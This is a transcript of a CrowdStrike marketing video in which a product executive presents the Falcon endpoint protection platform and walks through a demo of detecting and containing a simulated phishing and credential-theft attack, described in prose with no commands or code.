CrowdStrike Falcon Endpoint Protection Platform Overview and Demo
CrowdStrike has revolutionized endpoint protection by unifying next-gen AV, EDR, and 24/7 managed threat hunting — all delivered via a single lightweight agent. Watch now as Dan Larson, VP of Product Marketing, shares the CrowdStrike story. Understand how CrowdStrike Falcon protects customers against all cyber attacks, how it is certified to replace legacy AV, and why the Falcon Platform has reinvented the way endpoint security is delivered with its industry-leading, cloud-native architecture.
Cloud Delivered Endpoint Protection - CrowdStrike Product Overview and Demo
Hello, and thanks for joining us today. My name is Dan Larson from CrowdStrike. CrowdStrike is an endpoint security company that’s setting the new standard in endpoint protection. Our promise is simple. We stop breaches. How can we make that claim? Well, it’s pretty simple if you step back and look at it.
We have five years of experience in providing protection to our global customers, and in that time zero of our customers have had a reportable breach. How do we do it? We provide wire speed visibility into all of your endpoints, and combine it with proprietary breach protection, technology, and services. This endpoint security market is too full of fud. It’s better to show you how we’re different than to tell you about it. So let’s get started.
As CrowdStrike has grown, many of the world’s largest organizations have trusted us to secure their endpoints, and ultimately to protect them from breaches. At the end of the day, customers are voting with their budgets. We’re growing 100% year over year, and adding 100 new logos every quarter. These customers hold us to a high standard, and we have a customer retention rate of over 98%. If you select CrowdStrike, you’ll be in good company.
The company was founded five years ago by George and Dimitri, both longtime security executives that were frustrated with traditional endpoint protection being fossilized without the advantages of modern innovations. We raised over $100 million from three very different investors. The Google investment really validated the massive innovations that we’ve created under the hood. Accel recognized the early growth in market adoption. Warburg Pincus sees the focus on fundamental economics, and are offering their expertise and scale as the largest PE firm in the world. As a company we continue to capture great industry recognition from the likes of Gartner, Forbes, and Inc. 500 for both our technology and our market leadership.
We’ve heard our customers loud and clear. The solutions are too complex, and more importantly, they’re ineffective against modern threats. They’re frustrated by the ever-growing complexity of their security architecture. Legacy vendors are continually asking them to add more components to an already complex solution. This makes it harder to manage, and also taxes the endpoints to the point where it interferes with employee productivity. And even with all of that investment and effort, they simply aren’t moving the needle from a security perspective. Incidents, outbreaks, and breaches continue to plague organizations.
Making matters worse, all of these Legacy solutions are still built on signature based technologies. Signatures are woefully ineffective in the modern threat landscape. Signatures have massive blindspots for things like fileless attacks, and abuse of legitimate system tools like PowerShell. Signatures also require human interaction to build. This leaves the customer exposed to new threats for days at a time, because it takes human analyst time to investigate the threat. Then it takes more time to create the signature, and then even more time to distribute the signature. While that process is underway, the attacker has free reign over the target environment.
CrowdStrike represents a radically new approach. We have combined all those security capabilities into a single lightweight agent that’s powered by artificial intelligence rather than signatures. We call it CrowdStrike Falcon. This allows us to deliver anti-malware protection without the need for daily signature updates, but this is just the beginning. That same agent also uses our new protection mechanisms like machine learning, behavioral analytics, and continuous monitoring to provide protection against today’s more sophisticated malware free attacks.
Falcon gives you much better protection, while also being invisible to your end users. It also represents an opportunity to remove Legacy Solutions. These include antivirus, host intrusion prevention, IOC scanning tools, sandboxes, and more. At the end of the day, you’ll have a much more effective solution that doesn’t slow down your systems. And that solution is delivered by the Falcon platform. With a single agent and a single management interface, we can deliver complete endpoint protection against today’s threats by providing next-gen antivirus endpoint detection and response in a managed to threat hunting service.
Because this is built as a platform, we can continually add apps and services to adapt to the ever changing threat landscape. For example, we also provide a threat intelligence service and an IT hygiene app on the platform. But this list of apps and services is continually growing. To show the power of the platform, we’ve set up a demo to show you all the parts of the platform in action against a modern threat.
In this demo you’re going to see a modern attack from the CrowdStrike perspective. What distinguishes a modern attack from older attacks is really three key characteristics. First they begin with a fileless infection. By not writing anything to disk, they can bypass most Legacy AV Solutions. Second, once they have control of the system, they use built-in tools like PowerShell to evade detection. Again, this is a blind spot for Legacy AV Solutions, because they trust those built-in tools, and lack the capability to investigate the particulars of what those tools are doing.
Finally, the modern attack will persist in the environment by establishing backdoors that are so subtle that they slip past detection by most security tools. These techniques are an obvious choice for attackers, because they allow them to easily bypass antivirus, firewalls, application whitelisting solutions, and even sandboxes. They do not, however, bypass CrowdStrike, and that is exactly what you’re going to see in this demo.
This is our management console. All of our apps and services are managed here. On the left-hand side, you can see all the apps that you have access to. These apps give you the ability to manage your implementation of Falcon, and also give you the visibility necessary to identify, investigate, and remediate threat. In fact, that visibility is a foundational element of our solution. We operate as a DVR for your endpoint recording all activity so that it can be understood in a security context.
This data also provides basic IT hygiene data so that you can understand where you have coverage, and where you don’t. This includes information on managed and unmanaged systems, as well as insight into application usage and privileged account usage. This raw visibility is incredibly powerful, but where CrowdStrike really shines is in its ability to automatically identify threats in that data set.
So let’s go to the activity app to investigate a threat that we recently automatically identified. This is the process tree that shows the complete context. Really tells the whole story of the attack. The most obvious part of the attack is this icon indicating that a piece of malware was blocked. You can see that our machine learning identified this file as malicious, and prevented it from executing. This little sliver of the attack is what you’re used to seeing with the Legacy AV Solution.
CrowdStrike goes far beyond simply showing when it blocks a piece of malware. It provides a complete view of the attack in real time. It also provides forensic details on the right-hand side of the screen to speed investigation and response. This level of detail would take days or weeks to compile with Legacy tools, but you can see that we deliver a live view of forensic details right alongside the process tree.
To better understand this attack, we simply move up the process tree. In this case, we see that the incident started in Outlook. From Outlook the user clicked the link, and launched the Internet Explorer. The web site was able to exploit a vulnerability in Internet Explorer in order to instigate a drive-by download. This tells me that I’m dealing with a phishing attack.
More importantly, I can see that the attacker was successful, and that this attack is ongoing. Now that he has remote control of the system, he begins working towards his goal. The easiest option for the attacker was to drop malware, but that was blocked. So now it’s time to use the tools that won’t be blocked. In this case, he’s using the Windows command prompt, but attackers will use just about anything that’s built into the system like PowerShell, WMI, PsExec, or scripting files like batch files or VBS files.
Legacy tools cannot see malicious actions being taken by these utilities, because they are trusted tools. CrowdStrike sees all activity on the machine. Even activity carried out by trusted applications. This makes it easy to see the malicious activity. In fact, we can see every single operation done by the attacker down to the specific commands he typed in the command line.
In this case, we see that he started by using “who am I” to see if he has admin rights. He does not, so now he has to get some admin credentials. To do this he invokes a PowerShell script that downloads a credential stealing tool called Mimikatz, and injects it into running memory. Again, to avoid writing anything to disk. He then uses this tool to get the password for the system admin account. He can now continue his attack with completely legitimate credentials making it impossible for most security tools to distinguish him from a legitimate administrator.
It looks like he then took it a step further, and also created a second administrative account on the system. This enables him to persist on the system even if someone realizes that the admin account was compromised. We then see the attacker attempting to ping his command and control server. This particular domain is known by CrowdStrike intelligence to be malicious. To learn more about this indicator, we can pivot to the actor’s app to see what else CrowdStrike knows about this attacker.
A quick search reveals that this C2 server is known by CrowdStrike intelligence to be associated with a Russian adversary known as Fancy Bear. This level of threat intelligence is unique to CrowdStrike, and enables you to further explore the incident, understand potential alternative attack vectors, and work towards predicting future attacks.
In this case, we can take their other known C2 domains, and see if anyone in our environment is connecting to them. In seconds we can see all systems currently connected to those domains, and also all systems that have ever connected to those domains in the past. Retrospectively searching for data like this is extremely difficult, but we can do it in real time because of our threat graph.
Interestingly, that very same data in the threat graph, is also being proactively investigated by our Falcon Overwatch team on a 24 by 7 basis. They act as active partners in the defense of your environment. And in this case, they also saw the threat, and thought it was severe enough for you to be alerted. Not only did they alert you to the threat, but they also provide full details on the attack, and share their expertise with you to help guide remediation. This kind of assistance is a huge value add for both mature security operations centers, as well as organizations that do not yet have a fully staffed SOC.
The good news is that I now have confirmation that only one of my systems is talking to any of these domains. So we can jump back into that investigation. The alarming thing about the state of the system is that this ping command is currently running. This means the attacker is live inside my environment right now. To kick the attacker out and to mitigate the spread of the threat, we can network contain the system. This containment survives reboots, and also comes with the flexibility to block all connections except those that are made to the Falcon platform or to other security tools that you specify.
You can see the attacker system in the corner, and you see that as soon as I hit the contain button, the attacker loses his access. The attack has been kicked off the system, and the security team can now move forward with confidence. Now that the situation is under control, we can begin to track and ultimately close out the issue. Here we assign the case to our investigations team.
At this moment, we can zoom out and recap everything that just happened. It’s also important to note that for the sake of this demo, we set our policies to merely detect rather than block the various stages of the attack. But please understand that we have full blocking capability, and could have stopped this threat at multiple points of the attack. It’s also crucial to understand the role that the Overwatch team plays in this. They see all activity across all customers, and use that global view to provide you with better protection.
Also, if you look at this attack, you can see that multiple protection mechanisms were used. We stopped the malware with machine learning. We used exploit protection features to identify the initial exploit. We used our system recording and behavioral analytics to identify the malware free elements of the tech. We even had a real human, an expert threat hunter, chime in to help work the incident. While we have a number of competitors who can do bits and pieces of this, CrowdStrike is the only security company that can do it all.
Combining this complete level of protection and visibility with the cloud architecture that’s easy to implement and built on a single lightweight agent, you can see how we we’re really changing the game for endpoint security solutions.
So what makes us different? We see everything that happens across the entire attacker kill chain. Our competitors only focus on a specific area in the kill chain. For example, Legacy AV vendors mainly focus on malware, and they’re mainly concerned with the delivery stage of the kill chain trying to identify the file as good or bad when it’s written to disk.
You also have sandboxes, host IPS, and other behavioral solutions, and those are effective at understanding if something is attempting an exploit, and can sometimes help prevent the delivery of the threat. And then there’s a whole other batch of solutions that don’t even make an attempt at prevention. Instead they search for indicators of compromise in the environment, or they try to uncover threats by triangulating data points from log files or other data sources.
The problem with each of these approaches is that they leave you with blind spots that then puts you in a situation where you either have to integrate multiple tools, or wait for one of the individual solutions to bolt on new capabilities. Both of these approaches are bad, because they result in untenable architectures and ever increasing agent bloat.
CrowdStrike is very different. We’re built from the ground up to address this problem, and see across the entire kill chain. Not only do we provide the protection necessary to block attacks as they happen, but we also record everything, like a DVR for your endpoint, so that those split second decisions can be re-evaluated at a later time. This re-evaluation is continually done by our technology and by our Overwatch team, but we also enable you to do proactive threat hunting, and investigations into your data.
The reason we can do all of these things is because of our platform. It is cloud based. It’s built on cutting edge graph database technology that powers our artificial intelligence, and every other aspect of our products and services. As new security needs arise, we simply build another app or service on top of the platform. This is why we are not dogmatic about any particular approach. We aren’t the machine learning company or the threat intel company. We’re the company that stops breaches, and uses whatever means necessary to get the job done.
Today we have five apps and services that run on the platform, but more are constantly being added both through in-house development and through our partner program. The benefits of the platform are really quite simple. Because we’ve built this from the ground up in the cloud and committed to delivering it with a single lightweight agent, you get better protection. Nobody else in the industry combines next-gen AV, EDR, and manage threat hunting in a single agent. It’s this combination of these three capabilities that really moves the needle from a security perspective.
You also get immediate time to value. Because we do SAS delivery and have a silent installer with no reboots, means you can start your deployment right away, and push to all systems immediately. We once deployed to 77,000 nodes in two hours with no help desk calls. And you get better performance. We offer all of this with a single agent that consumes less than 20 megs of disk space, less than 10 megs of memory, and less than 1% of CPU when active.
As you can see, CrowdStrike is easy to deploy and easy to use. It’s also important to recognize that it’s easy to integrate with your existing technology stack. With our CrowdStrike elevate partner program, we partner with technology leaders from around the industry. This integration allows you to get more value from existing investments, and also creates opportunities for new integrated solutions and workflows. If you’ve got one of the products on this list, then CrowdStrike can make it better.
That’s a lot of information. So I’d like to just step back, and recap some of the highlights. First and foremost, CrowdStrike prevents all attack types. Second, we can provide five second visibility to every connected machine in your environment. And finally, we can reduce your costs while increasing your ability to stop breaches.
Well, that was a quick introduction of CrowdStrike. We can now dive deeper into any of the topics that we introduced. Where do you want to start?
For technical information on installation, policy configuration and more, please visit the CrowdStrike Tech Center.Visit the Tech Center